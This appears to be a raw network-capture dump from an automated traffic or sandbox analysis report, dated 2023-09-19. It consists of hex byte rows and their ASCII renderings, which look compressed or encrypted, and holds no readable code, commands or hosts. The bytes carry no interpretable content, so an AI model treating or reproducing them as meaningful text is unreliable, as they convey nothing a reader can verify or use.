                                                                          2023-09-19 07:21:51 UTC146INData Raw: bb f4 32 f6 d2 41 1e 33 bb 0d 3d 04 53 97 99 06 14 4b aa 3d 8e 4a 2a 37 a4 e9 1a 48 c7 8c 2a 90 85 1f 2b b3 c3 73 20 bb c9 21 f3 dd 32 28 04 81 a5 98 b3 ea 65 9e 63 5b c2 75 5d 6d 58 05 4c e8 6f aa 4a be 2f 30 67 63 89 20 42 97 6f 86 71 80 da 8f ee ba 7d f4 a4 1a 28 3f 2c f5 b7 81 8d d4 ab b5 9e a6 9a 52 f0 49 d1 e3 3d 5e d4 d7 c2 56 bc 5c c5 6f 36 1a 3b 46 0b 34 f3 23 86 85 76 ae a9 40 b0 b6 2d 84 71 0d 4f e2 0a 17 ba 08 64 6a a8 e9 00 ad 33 d5 f0 af fa b6 38 83 2a d5 49 54 2f 76 10 b8 33 fb 3b 64 dd 84 91 c4 3b d2 f2 7f 23 6a 59 cf 2f 51 89 e8 f9 75 b7 e6 14 d3 cc 87 c2 40 c9 8d 07 c4 2c 62 c1 a0 cd f8 a4 5d 12 f4 db ad b1 ca 0a 4f 3f 52 61 c9 a7 09 7f 9b a2 50 2c 50 83 c8 70 a0 a6 d7 8c 14 d9 1d 78 f9 e2 77 b7 72 66 0c a6 0d 46 35 ff 6d 5e 13 b9 d8 37
                                                                          Data Ascii: 2A3=SK=J*7H*+s !2(ec[u]mXLoJ/0gc Boq}(?,RI=^V\o6;F4#v@-qOdj38*IT/v3;d;#jY/Qu@,b]O?RaP,PpxwrfF5m^7
                                                                          2023-09-19 07:21:51 UTC150INData Raw: 04 aa 91 3a 5a da e5 ac 6e 64 ca e4 98 ea ff 60 d3 8b e7 bb 3b b9 02 bd 6a fd a9 33 91 32 db 17 ce f3 b8 9b ae 8c 0b 6f 43 8c 02 a5 fd 5a a7 34 5d 4f 49 18 7c 25 8d d4 b3 30 56 5b b7 d6 92 ae ac 03 db f6 c2 c5 41 73 84 e8 10 2d 99 88 50 5c af bf c3 66 48 40 ba a9 4c 76 c0 7f 32 cf fa 80 2b 36 5c 61 d3 03 2e c1 75 09 68 77 ac 1f ea 5a 24 2f e5 ea 1a e5 e3 85 8e 0f 68 4c 2c 83 b0 37 c9 9a 57 d2 2e 82 b5 78 31 30 44 dc 60 0d 87 3e e0 f5 fd 55 5e 48 db 37 40 38 32 5b 67 e0 b7 36 be 68 50 be f6 74 ec 42 52 6d 4c 19 ad 31 d4 52 6e 35 5a d5 ec 39 98 cd 38 7b 9e 4b 69 b7 7f fa d5 af d1 54 dd fd bd 93 e1 88 14 27 93 27 b5 80 13 94 a4 d4 ad e6 d0 16 fd 8a 9a 0f 01 58 df f0 ca 89 89 6a 41 ee 69 d1 52 d0 17 59 eb f7 38 3e 03 d1 9b cf 1f ae 46 8d 5f a3 25 6a 96 b8 5f
                                                                          Data Ascii: :Znd`;j32oCZ4]OI|%0V[As-P\fH@Lv2+6\a.uhwZ$/hL,7W.x10D`>U^H7@82[g6hPtBRmL1Rn5Z98{KiT''XjAiRY8>F_%j_
                                                                          2023-09-19 07:21:51 UTC154INData Raw: dd 4b 47 30 3c 34 0d 16 e4 55 3b 50 a8 bc 22 91 c3 2a 51 f1 4f 81 68 59 85 7e e7 19 d1 96 c3 6a 31 0b dd 57 c0 51 63 f2 b1 a6 f9 a2 3d 51 95 eb 31 97 2e eb 3f 6e 42 eb 14 2d ef f0 15 5f bd ce 84 40 f5 56 40 25 54 1e 6d 9e 9e 5b 3b 9b dd 71 81 f4 cc 9e 98 29 aa 8e fd 9d aa de ee 91 7c 1d 09 d6 27 02 e0 67 31 fe 29 4c 18 69 03 85 9d 8d df 98 13 6d 14 e9 66 a0 12 76 25 a8 63 2e a0 93 31 08 51 65 ed 4a ec f3 3f 9a 4d 36 a9 93 e0 00 7c d9 e5 d9 5d ba fc 7b 56 4d ce 1c ff 9a 00 1a 97 a0 d9 97 52 23 3b 64 e4 cb 4e 66 5c be 28 b0 b1 04 75 3d d9 dc 19 35 ef 12 2e c4 4a 29 ea 9b 09 2b 28 d3 cf b3 0c ef 50 13 87 c4 c6 10 36 f2 dd 58 69 2d f2 f1 3a 75 12 b7 e2 cf ee ad c9 47 03 23 c4 05 f2 d2 15 0a 6a 06 de a7 a8 ad 71 ca ff d2 df 60 2b 3e 7d d1 70 7e c2 43 34 8f d6
                                                                          Data Ascii: KG0<4U;P"*QOhY~j1WQc=Q1.?nB-_@V@%Tm[;q)|'g1)Limfv%c.1QeJ?M6|]{VMR#;dNf\(u=5.J)+(P6Xi-:uG#jq`+>}p~C4
                                                                          2023-09-19 07:21:51 UTC158INData Raw: 3c cf 56 9b f5 6f 54 f5 8b 6a ca 90 e6 ac 45 77 b3 53 2e 6b 38 4f 44 24 13 d8 e6 3d 33 b6 19 1f e9 d4 3c 57 c2 04 60 de 9b e9 4e cc 67 bd c6 53 2f ae 84 16 74 5d 88 a1 76 d3 94 23 3a 22 ac 9f be 6f 0f 0a ac 8b b5 a4 35 60 94 f0 84 ad 2d 28 77 de c6 11 c0 18 d3 23 34 fd 8b 5f f8 39 01 83 4d dc 10 c5 b2 75 50 ea d2 54 c5 ee de c1 76 a5 0f 62 76 13 08 ec 80 97 99 70 41 14 d2 3a b8 52 4a 2a f7 a8 55 6e cd ed 2c 15 68 5d ee 15 69 63 07 51 de cb 62 b1 af 02 83 3b 08 26 1f 72 53 a4 cb a3 db b5 b9 66 ef 82 a3 15 a1 20 6f 1e e6 55 ed b9 41 2a cf 5a 04 53 8a 0a bc da 4b ae 40 c2 4b 27 03 eb e8 77 48 d4 e9 9a 20 0b 22 3a 95 6c 60 c3 02 27 28 94 06 36 3e d0 27 5a e6 d5 5a e0 12 6b 20 93 1a 04 01 d5 a3 10 06 c6 23 bb a8 80 40 bd 9b 61 7b 93 ed 93 70 db 47 2c 25 47 12
                                                                          Data Ascii: <VoTjEwS.k8OD$=3<W`NgS/t]v#:"o5`-(w#4_9MuPTvbvpA:RJ*Un,h]icQb;&rSf oUA*ZSK@K'wH ":l`'(6>'ZZk #@a{pG,%G
                                                                          2023-09-19 07:21:51 UTC161INData Raw: 19 eb be 15 74 89 06 ad 19 c0 9d b1 f1 b3 42 9e a4 52 ac c5 88 0f 88 95 2a 2c 96 70 be be 78 60 2c c6 7d b1 c6 99 31 f8 45 a4 1b 38 60 e5 c4 5b dd 70 df 0e 12 1d 14 8d 88 cd 54 99 05 16 1e a1 be f9 4b 4d 74 d6 e1 6e cc 14 a5 3f f5 49 69 78 eb ac ed 73 eb 14 d4 c8 4d 8f 12 94 41 64 c6 a3 91 e3 0a 82 b7 0c 97 3f 84 7d 28 cb 15 7e be 70 97 ad 3d 50 d4 4e 41 68 34 b9 34 17 14 f8 55 ec d4 67 35 41 78 6f d3 dc 5f ac fb 70 14 fc a0 97 9f 58 4c ab df 07 49 c1 cb 13 bc ff 5b 36 1d 37 26 7a 69 62 d3 4c 18 2f 26 ff 2d 02 76 6f b1 6f ff 18 d8 d5 61 89 77 3f 32 8e ea 7f 8c 6f cc b8 c7 d2 1b 74 5e 08 33 90 0e d4 e3 ad b6 e1 30 d2 69 ba 5b ef 8c 19 e5 06 70 ad 1a a9 b0 46 79 b9 ad ec ff 66 db e0 a2 72 eb c0 cb 17 ea 70 b4 c7 49 58 5d 10 a0 0f ef 97 42 b5 e2 db 91 a4 22
                                                                          Data Ascii: tBR*,px`,}1E8`[pTKMtn?IixsMAd?}(~p=PNAh44Ug5Axo_pXLI[67&zibL/&-vooaw?2ot^30i[pFyfrpIX]B"
                                                                          2023-09-19 07:21:51 UTC162INData Raw: 1d 68 dc 28 ae a9 4e 59 66 91 04 be 0d 8d af 17 ca e4 34 11 cb e6 8b 55 65 6e b8 08 3b 62 6f b7 ac d0 da ad 06 99 8c 7e 29 c1 bf cf 66 45 fb 73 c4 25 f3 ec 54 e5 c8 51 f0 aa c1 82 45 1f ef d0 2e cc ed 12 29 b5 ee d5 e6 db 0e 0c f9 50 a9 01 df 1c b3 48 0f 88 66 30 1a 90 13 88 a5 c8 8c 98 b9 93 9b 4b 73 1a 3e 6c 17 d5 da 95 28 f5 eb f2 f1 3e 85 55 0a 62 86 c7 7d 1e d9 76 7f 85 bb 45 80 52 b5 a1 75 e7 45 71 45 56 0c 69 9f d1 a2 64 42 39 51 9a 28 d3 41 0d 29 a7 36 37 48 7d 82 e4 3d cc b3 d4 82 63 7d 62 3b 44 e8 70 92 64 0b 51 05 2c b8 55 aa 4f 0f 73 ec 81 53 dc 90 76 3f eb b7 e0 27 87 1e ea 39 70 9d ef 87 d9 6b 09 12 e9 71 8a ff c8 d8 17 9a bc 36 43 22 6b a0 d8 2a cb 6f 21 95 dc 7a 08 b0 ed ed 58 35 f3 ae 66 83 82 bf 89 f5 7d 07 91 ef 10 3d 1c 83 a2 64 8c 48
                                                                          Data Ascii: h(NYf4Uen;bo~)fEs%TQE.)PHf0Ks>l(>Ub}vERuEqEVidB9Q(A)67H}=c}b;DpdQ,UOsSv?'9pkq6C"k*o!zX5f}=dH
                                                                          2023-09-19 07:21:51 UTC166INData Raw: fb 17 c2 8b 30 0c 5d 30 ff 9a a4 8d 4c 04 48 2a 60 a3 86 4b 55 02 19 8e 3c 47 5b 76 a5 63 5c 40 48 f3 93 05 b1 90 ed 89 e7 8c b9 57 80 bf d8 2e 78 c8 59 53 8e 75 e7 74 f7 3f 00 6a 56 55 48 4a 76 71 1e 46 c5 6a 1f 3d c4 62 2c d8 9a dd 2e 09 5f d3 ca a0 63 b6 c7 6a 07 30 c7 43 10 83 20 b3 d7 e7 13 44 fa 67 43 7e f0 06 db 12 50 37 ce 10 77 44 ee 50 d5 b7 4e ea 4d dc 90 b1 1c 69 da c1 77 63 60 42 5f 1c 49 3f 11 74 8e bd df 30 5e 91 73 4f b7 33 c0 a8 b6 a0 23 74 2d 14 ee 38 08 93 00 82 fa dc c9 d5 ed 52 ba f7 ae fd 4b 86 42 0d 8b 7f 80 2f f9 7b d9 8f 86 2a 04 72 3d 8e 34 a2 04 d8 e6 b0 47 de 0f 53 f8 f5 61 0e f1 23 2b 6a 61 df e1 6f 4f 85 a8 6c 53 98 21 aa 3d 16 d2 8e 39 a5 03 28 8b 85 66 32 5d b1 09 b9 da 92 cd e9 44 33 f8 7e e2 98 e9 02 d9 d8 d7 da 83 15 f4
                                                                          Data Ascii: 0]0LH*`KU<G[vc\@HW.xYSut?jVUHJvqFj=b,._cj0C DgC~P7wDPNMiwc`B_I?t0^sO3#t-8RKB/{*r=4GSa#+jaoOlS!=9(f2]D3~
                                                                          2023-09-19 07:21:51 UTC171INData Raw: 46 8f 5b c4 d5 4b f1 c8 bc ab 72 48 93 9c ef e7 e2 17 8b 55 9c 18 de 5f 51 31 c0 8c ee b5 b6 16 30 f2 6f 6a 6b 7b f8 e7 bc 6c f9 82 dc ff 23 9b 78 9c 82 b7 0c ac 1f 9f f5 d5 76 fc ea d5 f8 20 e5 24 03 a8 cc 43 fc 1c 0f a3 16 35 c8 b5 72 3e c5 2c f4 a8 1a c3 44 b1 6e b1 d8 70 be 20 0f 21 22 8c b8 02 b4 8e 46 e8 25 06 e5 a7 09 5e 9e d6 58 57 b8 9e 36 ac 42 eb 2c 0b 2d 8d 8f 23 40 38 02 5e 0c b6 3e 02 3c 3a 89 87 92 e6 5d 68 0d 48 18 5e 7b 00 c5 58 43 5e d7 03 33 95 66 0d fa bb a8 17 32 32 41 94 65 bf 93 40 98 17 4e 00 a3 54 72 fc 2f 53 cc d0 69 88 7c 1e d1 8d fb b7 14 de f3 a1 00 2e 31 ae 9b fb e3 ab 88 21 4d 67 8f 43 8a be b5 b3 74 45 84 89 fb ef d0 55 ab 39 18 68 d7 9b 9b f4 25 cf ee 2e fc 6e c9 f4 0e eb 8f 8c 4c 51 af 1e 5a 70 40 b6 f3 6f 6e 96 66 a7 20
                                                                          Data Ascii: F[KrHU_Q10ojk{l#xv $C5r>,Dnp !"F%^XW6B,-#@8^><:]hH^{XC^3f22Ae@NTr/Si|.1!MgCtEU9h%.nLQZp@onf
                                                                          2023-09-19 07:21:51 UTC175INData Raw: a5 1e d6 8c a1 d1 6f c2 26 29 97 0d 24 2c 61 49 7d 44 c2 c9 87 9a 5d b2 0b fd 6e 32 d2 a7 69 16 a1 d4 0b 71 5c 89 a5 ff 7e 64 54 71 f1 82 a5 ca e1 84 36 f8 fd f8 44 56 88 bb c0 97 e6 26 aa f2 04 3f 57 51 a1 da fa c4 eb 92 5e 49 e4 1a 98 bf ba e3 84 c5 5a c0 65 04 db 67 e6 b0 15 db da d0 90 95 67 2b 52 09 49 bc 47 b9 ca de cd 14 12 16 f4 2b 68 be 66 a5 4a e1 3b 88 23 a4 3c 6a 41 8e 2c 57 7d 0a bd b2 4b c2 89 3a 7e 71 ba 07 fd 00 31 54 12 fe ba 58 da 60 c1 28 57 7a 71 11 5e 96 da 5d 38 4a 46 96 4d ce 69 ec 1a 6f 9f 8e f7 4a 1a 86 84 a5 03 50 12 52 f2 74 a2 ca 41 39 55 68 49 05 b4 a1 6b 4e a4 30 e0 e4 81 11 cd ca d2 ad 4d 53 d3 29 24 b3 db c6 46 97 b9 b4 30 5d 9d 2a 7a e3 bf f3 fb a3 7e 1c 94 7c 9a fc e3 7e a5 c3 ad f0 84 72 93 cc f9 f3 29 85 92 1d b1 d7 29
                                                                          Data Ascii: o&)$,aI}D]n2iq\~dTq6DV&?WQ^IZegg+RIG+hfJ;#<jA,W}K:~q1TX`(Wzq^]8JFMioJPRtA9UhIkN0MS)$F0]*z~|~r))
                                                                          2023-09-19 07:21:51 UTC179INData Raw: a7 ad 67 5e a3 48 ce ce e3 85 64 18 2d 2b 73 8d 75 8f 9a c1 10 ed 71 06 05 78 ef 84 c3 56 92 24 af ae 5b 10 fa 42 33 58 35 81 70 6b 8a b4 4e b8 f6 7d a1 f9 66 25 67 5f b4 f3 14 d1 f9 52 a1 a5 80 70 5c c6 02 f4 3a 2e 13 84 21 d2 18 a3 ce 88 89 c6 54 c4 c3 57 e8 ed fe f3 fe 99 2f 37 2b d9 67 e5 f1 94 f4 dd 8d e2 98 29 32 20 a5 50 bd 74 27 ac 62 f6 fb fc 8c 3d 82 32 18 84 06 18 d1 80 2e 16 8d da 81 91 34 6b 23 dd 4d ff 37 fd 06 be a7 fe 33 03 ef 73 95 18 72 b1 54 e0 01 0d e7 28 a1 20 e0 88 2a 58 97 2b e5 a6 c1 0f 0f 6f 9c 21 e9 9c af f8 4d de 80 26 37 17 37 41 68 99 cc 34 34 6d c0 60 4b c9 f2 55 a7 81 37 02 4a 1f 51 cc 29 4f 99 51 74 62 bb 1b c6 d2 b0 33 f5 76 ae ce ca 94 2d 45 4d 27 40 21 9a 3e f9 15 0a 92 55 15 c3 70 23 5d 78 a9 04 1b 1c 7f 2a 5f 8b a2 36
                                                                          Data Ascii: g^Hd-+suqxV$[B3X5pkN}f%g_Rp\:.!TW/7+g)2 Pt'b=2.4k#M73srT( *X+o!M&77Ah44m`KU7JQ)OQtb3v-EM'@!>Up#]x*_6
                                                                          2023-09-19 07:21:51 UTC183INData Raw: a0 a3 c7 8a 13 8c 41 8e a8 75 57 ed 44 25 ab 88 21 49 7a 26 55 e4 70 91 ce cc 19 61 1b fc 02 89 b5 a3 ec bd 32 7d a0 b9 3a fd 16 55 f4 33 55 d2 9e a6 45 32 12 24 3e b8 3c c6 ad 7d 3c 06 d2 1b 7e fc dc fe 5c 2f df 1b a5 a9 9f a1 02 4f 4f ee 0d 86 c8 08 92 f6 72 00 99 1f c3 62 37 41 d1 11 a6 e2 a0 12 1c a3 a0 dc 68 b8 70 9f 2d d9 f6 52 87 bd b0 f9 cf 18 40 0d b3 ff 91 c8 76 f9 0c ed 38 11 6b e3 ab 10 b5 48 b4 db ed 6a c6 43 37 a3 c2 98 f7 3e 32 e4 c8 6d 7a ba 5f 0f 6e 6c 92 33 a4 66 ad e6 eb 4c db 7b 47 38 05 69 5b a3 0f 3a e4 40 7c 3b 7a ee 45 6d c3 86 2f 1b 97 c4 d3 2e 1e 9e ab 59 ab 46 ec 20 2b fe 06 72 0a 2e 62 b4 cc 49 25 ce 04 b5 7b 5d 3b 8c c9 ba 0f a9 bd 03 49 a7 65 71 f9 4c 81 a3 35 84 fe 11 77 31 ac a8 f0 f0 3a c1 d7 4f d7 16 2e 7d ee e2 2c 8a 56
                                                                          Data Ascii: AuWD%!Iz&Upa2}:U3UE2$><}<~\/OOrb7Ahp-R@v8kHjC7>2mz_nl3fL{G8i[:@|;zEm/.YF +r.bI%{];IeqL5w1:O.},V
                                                                          2023-09-19 07:21:51 UTC187INData Raw: de f1 f8 fa 8e 70 b0 83 5c bf 12 7f 8f 5e a9 cc eb f8 2b 48 c3 f9 26 17 24 3c 1d c9 bd e8 1f 70 bf 42 f8 1f 71 34 2d 84 a7 59 ca 19 bc e5 b2 93 fd 13 0b 5a 7d 0e 56 b9 ce 05 be 51 a4 1a a0 24 8c 81 94 25 12 d0 89 35 81 b4 e2 f4 11 23 37 f4 d2 58 f2 08 a1 4f f5 48 38 9c d9 e3 36 7c c9 a5 0e 1a 34 22 46 1d 6d 11 2a 09 5e 2a 84 2f 8d 6d 9e 22 8e 96 38 3c 25 2d 2d 93 30 af 74 8c 9f 16 97 4b ee 05 2c 84 44 41 53 6f e5 61 83 9a ca af 83 25 59 9b 96 27 3c 9f d6 ad de 6c c2 14 ef c3 8c 9a 39 e9 f2 fc 12 1c 91 89 93 c6 67 6e bf 4d 3e 03 76 6c db 72 45 e3 d5 df 86 b3 7a 6c 61 2b b0 f4 30 80 5c 09 9b 62 18 7b e5 7c 1b 4e 98 fc 48 5c e4 aa b8 3b 4b 6e 02 70 06 41 2f 19 da fa 64 e4 ed 1c c0 38 87 9b 7c fa d1 f6 0b 1f 84 0b 4f 6a c2 57 db 09 a1 96 35 67 c3 4f 9a 5c f9
                                                                          Data Ascii: p\^+H&$<pBq4-YZ}VQ$%5#7XOH86|4"Fm*^*/m"8<%--0tK,DASoa%Y'<l9gnM>vlrEzla+0\b{|NH\;KnpA/d8|OjW5gO\
                                                                          2023-09-19 07:21:51 UTC191INData Raw: 12 6e 7d 84 82 6b 04 3b 73 04 cb 70 f7 ed 88 d2 5a f1 46 6a be ae bb eb c6 36 86 c0 ce e9 78 ed e4 a9 33 25 d4 a8 b0 03 ca bb cd 50 78 e9 3f f9 0c f7 1e 58 64 7a cd 18 c8 8f da fb 8f ff ea b8 f5 35 61 92 45 65 f2 0f c5 a7 ca f0 e3 68 89 8c e9 ce 9f da ae d7 c3 83 d1 19 31 a3 43 87 ce d4 6c ab d4 4b b6 b1 c3 cf 57 8b e8 3f a1 75 2e 90 98 8a 01 84 a3 fc fe 1f 09 7a 58 11 5b 22 41 c4 d2 74 9d 73 2f c3 7b bd df eb e7 79 6e 3e 77 27 a2 12 d5 d2 e2 ed 69 49 39 67 7a c4 23 67 e1 30 a5 dd 06 4c 1a d3 53 50 7d 41 77 88 ee 70 30 a5 78 ae 9e 95 39 8a 2a 44 5c 54 b1 65 38 41 a5 21 b9 62 4d 8c 0c c9 55 42 de 76 8d 89 8a d2 b9 c8 1d bd e3 82 4b ab 83 8c 97 23 12 21 c1 57 c7 bd 91 b2 9c 35 30 12 db b5 72 4b 98 33 53 24 3e 8f 70 4c c7 f6 dd 55 1b a1 ef 4f 0b 9a d6 c1 56
                                                                          Data Ascii: n}k;spZFj6x3%Px?Xdz5aEeh1ClKW?u.zX["Ats/{yn>w'iI9gz#g0LSP}Awp0x9*D\Te8A!bMUBvK#!W50rK3S$>pLUOV
                                                                          2023-09-19 07:21:51 UTC193INData Raw: 58 d3 57 27 cc 50 e9 8c d3 37 1c 22 72 39 5b 0b 62 46 0d f3 f5 05 04 2f 7a f0 bd 36 a1 10 4d 64 18 f5 d8 1c 96 13 7e 2c 4c 2d 40 0b 1e 99 99 b3 44 64 f4 78 b3 44 1d 2d 7d 9f 99 b1 a3 dd 79 cc 42 c1 53 92 c3 1d 03 96 d5 9a 75 49 50 e6 8e 10 35 e1 94 8e 28 72 79 53 3c 41 aa 1d 92 6d 57 f3 9e 49 a2 5a e8 3e c7 8d 91 35 13 4f 1e 34 cc 56 48 3c 66 47 63 0f a5 fa e1 45 27 95 b7 39 8f 21 f8 27 05 a3 2f 3b 86 10 a5 c2 a1 1f d2 3e 2f be 80 4d 13 9c 26 e5 d6 9f 89 b4 8c 3e 18 1e 85 1a e9 2b 27 f2 fa 40 ff b3 39 72 e6 49 23 62 1d 9c eb 9a 58 5b ea 80 fb a8 e2 c1 72 a0 45 6a e4 e2 e7 c4 91 27 f9 53 a8 e9 90 6c 30 c0 ea 1d 48 15 01 88 ad ae 4c d0 be 91 51 1f 07 a6 aa 7a 97 19 9c d8 5d c7 5b 13 b1 cb 96 1e 9b 63 51 81 fb fa e8 27 8f 4c e0 16 84 da cf 3d d2 3e 24 06 9a
                                                                          Data Ascii: XW'P7"r9[bF/z6Md~,L-@DdxD-}yBSuIP5(ryS<AmWIZ>5O4VH<fGcE'9!'/;>/M&>+'@9rI#bX[rEj'Sl0HLQz][cQ'L=>$
                                                                          2023-09-19 07:21:51 UTC197INData Raw: 27 20 1f 67 a5 e9 d3 c4 08 cb 20 8f 6a 3f 78 44 b5 e6 f3 44 fb b8 09 29 ef 83 2d bd 45 54 e1 bd 20 82 58 34 f9 94 7c c4 ff 3e e1 76 8b 9d 4f 68 87 88 b5 17 b8 83 eb 44 21 35 4f 7a d8 be 9b 3c 8b a5 83 96 e3 3e 06 90 ac 97 9a dd 0d df cf 22 30 9c 83 0e 1a 37 4d d5 b4 17 b4 52 61 c7 ed 5a bf 01 6a 50 ee 2c ef f3 ec a0 f3 01 a5 e4 66 6e 8e 57 75 f0 88 fc c4 9f 6c 5d 28 de 79 6f 95 e4 96 26 6d 52 b8 29 bc cc 32 2b 48 df d8 22 6f e7 37 d9 df 43 d0 a5 17 c6 c1 f0 fd 3b 1b a0 93 4c 97 2e b7 d4 d1 e8 db 8c 60 61 32 7d 93 1e 42 e5 84 c0 57 a2 20 32 c6 7e 32 d3 a2 cc e6 89 89 60 47 55 e9 31 6e 68 ac 45 b2 b7 af c9 04 65 65 d6 1d df 48 83 21 57 41 9a e7 81 f3 44 4e 05 b1 9a b8 50 55 aa 4b 77 51 50 a5 ab 2a 3e 48 f9 0e f9 12 72 24 d7 e5 84 ac a6 2c 24 38 f6 28 4a 0d
                                                                          Data Ascii: ' g j?xDD)-ET X4|>vOhD!5Oz<>"07MRaZjP,fnWul](yo&mR)2+H"o7C;L.`a2}BW 2~2`GU1nhEeeH!WADNPUKwQP*>Hr$,$8(J
                                                                          2023-09-19 07:21:51 UTC202INData Raw: 5b e0 dd 42 03 62 11 c6 af d2 fb 8a 61 22 20 34 b3 ca 82 be b7 49 f8 65 ca 16 87 6e 47 bf 64 bf cd 9a 85 62 76 27 cc f3 b7 1c 03 59 3d 35 a3 e1 e0 2d c1 f3 33 d9 14 8f 24 84 fb db 49 14 08 b7 35 a5 50 57 a4 2f ec 55 e8 e1 4d 3d 5e 7f 87 fd 14 5a b2 64 1b 3b 69 f9 61 1b c8 09 7b 41 c0 52 48 48 8e b1 51 d7 c6 49 9b f3 de fb d0 bc 67 c5 36 a1 c7 17 85 cb 5f f7 53 bb 83 9d 4a 68 17 86 cd 2d d9 b1 c5 d2 e1 f8 9a 55 f6 63 19 e3 24 a5 2b 75 e3 72 3f 00 c8 9a 32 01 b7 33 f7 30 82 ac f8 4d b7 9e ea b5 de 26 4b de 2a 7d f2 12 45 ef d4 40 be 0e 33 30 12 a9 a7 7e c3 9b 60 a9 ce ff 07 d6 e0 05 05 86 f8 07 f7 01 ea 11 6c 2f e5 9e 83 d0 f3 9f 9b 42 29 27 87 e6 c4 0e 52 93 ba 43 4a 05 f1 04 25 8f 19 85 ca 71 17 d6 c3 1f 6f 93 11 18 1f ba 70 e1 5b 22 94 d2 ee 9d a0 44 84
                                                                          Data Ascii: [Bba" 4IenGdbv'Y=5-3$I5PW/UM=^Zd;ia{ARHHQIg6_SJh-Uc$+ur?230M&K*}E@30~`l/B)'RCJ%qop["D
                                                                          2023-09-19 07:21:51 UTC206INData Raw: ab 8d fc 0c 6c dc 8b 1a 90 1d 37 ac f8 78 79 d9 e7 25 4b bd 2a 49 8d a3 08 31 c5 8c f3 ba 6d 45 26 fd ac a7 46 bc 4b 56 f5 cb 87 3f 10 15 f4 2e 0c 69 51 11 9b c0 80 d2 f0 eb 86 48 93 1c 05 f9 ad ad 94 cd 4c 28 ec c5 a3 af dc 36 6a 8f 3d a0 7a 0d da 7b a1 a1 68 34 49 7e bf 86 ee 5e 3f 1f cd 0a 37 59 19 22 a3 c4 f3 b9 fc 80 67 a4 f0 77 12 5f 16 c5 05 73 14 c9 9a bf de 46 b3 1e 88 24 ee bb 7a 60 58 83 8a b7 11 e6 b8 18 88 b1 9b e5 bc 9c 90 98 b2 75 f8 02 2c 96 e0 0f a2 05 26 c8 97 ec 6a 08 cd 8e 10 68 0d 53 f3 f2 91 0b 79 1c 54 f5 d4 de 31 fa 4f ee b4 11 ed f8 94 d6 d1 63 45 57 dc ac 03 62 02 9e 7f 53 20 09 fe 2e 2c 97 e3 2f 54 32 f2 f2 4d 09 24 bb d6 7c 34 01 0d 76 91 e8 f2 c3 8a fe bb 62 6a 38 60 0d e2 75 e1 30 f1 39 d8 17 af 18 f5 1b f3 3b 9d 00 d3 fb e4
                                                                          Data Ascii: l7xy%K*I1mE&FKV?.iQHL(6j=z{h4I~^?7Y"gw_sF$z`Xu,&jhSyT1OcEWbS .,/T2M$|4vbj8`u09;
                                                                          2023-09-19 07:21:51 UTC210INData Raw: ee cc ad 61 c3 78 6d 2b 1e a2 90 99 70 fd 09 20 e1 40 46 0f 6b d0 28 04 24 69 d7 47 de 33 74 be 0e c8 e2 37 aa 28 35 12 a7 87 2d de 47 ba 02 f1 c4 c7 a7 fb 55 1f 5f e0 87 23 2b b0 80 59 0a f3 88 42 e0 ed 74 5d 94 a8 5b a0 1a ac 98 63 39 b7 1b 1d 53 81 d5 69 ab 27 c3 c9 ea 10 f0 cb a8 de f1 62 6d f6 84 57 eb 17 0c 86 b5 23 9e 3f 09 bd aa 8a 70 46 7b ca 39 16 3a 44 02 76 10 a7 70 c4 1a 55 6b 46 51 a3 e5 d3 a6 ea 6a 41 bd 4f 35 1d 3a 0a b7 ac ec 95 b3 12 55 30 94 cd 2b fc 3d b3 ce 4c 56 e7 21 a9 8f 2a f1 de e3 d9 65 0c 59 df 22 15 2b 3f be 8a 67 1e a9 4e 1b 12 67 32 0b cf d8 4e b8 b4 ec 6b 2e 82 86 0d e4 9a 45 41 4f 2a d9 0d 7f 64 90 a7 7a 67 9b 97 46 95 82 51 53 65 59 03 70 cc 96 97 18 fe 86 d6 8e e8 c0 a0 9a dd f3 64 0b be 3d 1f 1b 97 15 2c 1c 43 50 50 f9
                                                                          Data Ascii: axm+p @Fk($iG3t7(5-GU_#+YBt][c9Si'bmW#?pF{9:DvpUkFQjAO5:U0+=LV!*eY"+?gNg2Nk.EAO*dzgFQSeYpd=,CPP
                                                                          2023-09-19 07:21:51 UTC214INData Raw: 9b be 59 57 05 51 11 fd 90 e6 59 38 16 5b 2f 7e 68 80 75 a7 9d d7 6b 6a 99 27 0d 10 90 05 59 d2 32 80 97 7c cc b2 97 cd 40 8f ac 10 d5 fe ec 18 15 52 10 88 f3 99 65 ff 3c f5 43 08 91 c5 ba dc 1a e0 70 f5 3e 08 f6 73 09 41 16 de b0 ea 21 5d 0e ea 76 86 f0 e1 90 a0 42 35 9c 8d f0 5e 9c a0 ee 74 4d cc 4c bc c5 ad d7 e8 f0 bd 78 65 f2 ed 4f 42 22 66 c6 21 09 c7 18 01 f9 7b ee b8 e9 db 91 26 90 51 ce a6 80 4c cf 39 9d a6 2b 1e 78 0d f6 09 11 c4 cd f1 5e e6 e1 05 05 0b 74 04 80 84 b3 e0 6f 36 8b 2b f4 9b 48 42 50 72 44 88 57 44 c9 57 e0 07 27 42 6c 80 2b 04 13 60 11 e5 d7 7f 0a 55 33 90 54 32 ec af 9d 65 fd 2b 48 ef 75 8b 3a ee d3 b7 50 08 e8 a5 0a 12 c2 fe 73 29 5b b6 dc b4 85 b9 b4 af 92 f9 df cb 52 db 2b 77 b9 b7 33 91 5d 00 89 ca 8d 99 29 53 8c bc 3a b6 b2
                                                                          Data Ascii: YWQY8[/~hukj'Y2|@Re<Cp>sA!]vB5^tMLxeOB"f!{&QL9+x^to6+HBPrDWDW'Bl+`U3T2e+Hu:Ps)[R+w3])S:
                                                                          2023-09-19 07:21:51 UTC225INData Raw: 58 2a d9 4c d3 c0 f6 c2 45 2e e3 4a 71 e9 91 45 07 3e 32 d5 21 14 4b ee 6e e1 ab 23 b1 00 0f 92 e8 31 bc 43 67 b2 1b e7 3f 89 21 2f 7b ca e9 b8 ef ae 70 30 29 82 a8 a5 04 31 fd 9b d9 6f c1 1a 48 2d 7f 50 ec 43 05 24 a9 ab d6 ed b6 35 42 72 e0 28 fa 17 47 9e 84 20 d3 9b 70 df d3 83 7b be 39 fa ea 22 68 b2 1c 6f 67 2f 3a a4 35 44 22 12 a7 6b 45 fc cc 5c 79 7c 57 b3 5a 69 18 04 08 57 5a 64 24 ab 3e 8b 23 63 63 31 4c c6 83 1a b7 56 3f b6 45 9b e4 1c ac c0 ee eb 1f d8 4d fc 19 0f 16 5c ed 6b a4 ba d4 32 92 76 ce 21 4c d7 82 40 31 07 f6 d9 d2 01 f2 d3 e5 e3 b5 ff 19 7f 10 fd ea 1c d5 4a 3a 6c 0b a1 94 ee c8 4e 03 9d 4e 97 bb 66 ae 91 c7 52 67 15 79 f6 e9 67 64 ec 19 1e ea f9 ba d8 6c d6 8b 81 ad e0 c5 